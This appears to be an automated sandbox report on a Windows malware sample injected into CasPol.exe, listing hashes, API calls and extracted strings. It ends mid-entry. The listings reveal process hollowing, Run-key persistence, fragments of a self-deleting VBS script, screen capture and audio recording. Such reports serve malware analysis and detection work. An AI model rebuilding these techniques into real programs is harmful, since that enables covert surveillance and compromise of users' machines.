                                                                              • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                              • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                              • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                              • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                              • String ID:
                                                                              • API String ID: 2692324296-0
                                                                              • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                              • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                              • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                              • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                              • String ID:
                                                                              • API String ID: 1084509184-0
                                                                              • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                              • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                              • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                              • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                              APIs
                                                                                • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                              • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                              • String ID:
                                                                              • API String ID: 1272433827-0
                                                                              • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                              • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                              • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                              • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                              • String ID:
                                                                              • API String ID: 1084509184-0
                                                                              • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                              • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                              • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                              • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                              • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                              • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                              • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                              • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                              • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                              • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                              APIs
                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                              • DeleteDC.GDI32(?), ref: 0041805D
                                                                              • DeleteDC.GDI32(00000000), ref: 00418060
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                              • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                              • DeleteObject.GDI32(?), ref: 004180FA
                                                                              • DeleteObject.GDI32(?), ref: 00418107
                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                              • DeleteDC.GDI32(?), ref: 0041827F
                                                                              • DeleteDC.GDI32(00000000), ref: 00418282
                                                                              • DeleteObject.GDI32(00000000), ref: 00418285
                                                                              • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                              • DeleteObject.GDI32(00000000), ref: 00418344
                                                                              • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                              • DeleteDC.GDI32(?), ref: 0041835B
                                                                              • DeleteDC.GDI32(00000000), ref: 00418366
                                                                              • DeleteDC.GDI32(?), ref: 00418398
                                                                              • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                              • DeleteObject.GDI32(?), ref: 004183A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                              • String ID: DISPLAY
                                                                              • API String ID: 1765752176-865373369
                                                                              • Opcode ID: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                              • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                              • Opcode Fuzzy Hash: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                              • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                              • API String ID: 4188446516-3035715614
                                                                              • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                              • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                              • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                              • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                              APIs
                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                • Part of subcall function 0041B58F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                • Part of subcall function 0041B58F: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                • Part of subcall function 0041B58F: CloseHandle.KERNELBASE(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                              • API String ID: 4250697656-2665858469
                                                                              • Opcode ID: 03a34ccbb1719861567300b1fb31a781f765c9736e7961dcb0677a4d0e3d5b11
                                                                              • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                              • Opcode Fuzzy Hash: 03a34ccbb1719861567300b1fb31a781f765c9736e7961dcb0677a4d0e3d5b11
                                                                              • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                              APIs
                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                              • API String ID: 3797177996-1998216422
                                                                              • Opcode ID: fb087b58bfc3a3b2b8260ca2d682e14f903258253ee2e6fe22ab8b926fdeca3f
                                                                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                              • Opcode Fuzzy Hash: fb087b58bfc3a3b2b8260ca2d682e14f903258253ee2e6fe22ab8b926fdeca3f
                                                                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                              APIs
                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                              • SetEvent.KERNEL32 ref: 0041A38A
                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                              • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                              • API String ID: 738084811-1408154895
                                                                              • Opcode ID: 8cf0e19f8ce88e8d7cb937eb39cd8d73a713176ac88778056ef84971429f9c19
                                                                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                              • Opcode Fuzzy Hash: 8cf0e19f8ce88e8d7cb937eb39cd8d73a713176ac88778056ef84971429f9c19
                                                                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Write$Create
                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                              • API String ID: 1602526932-4212202414
                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                              • API String ID: 1646373207-165202446
                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 0040BC75
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
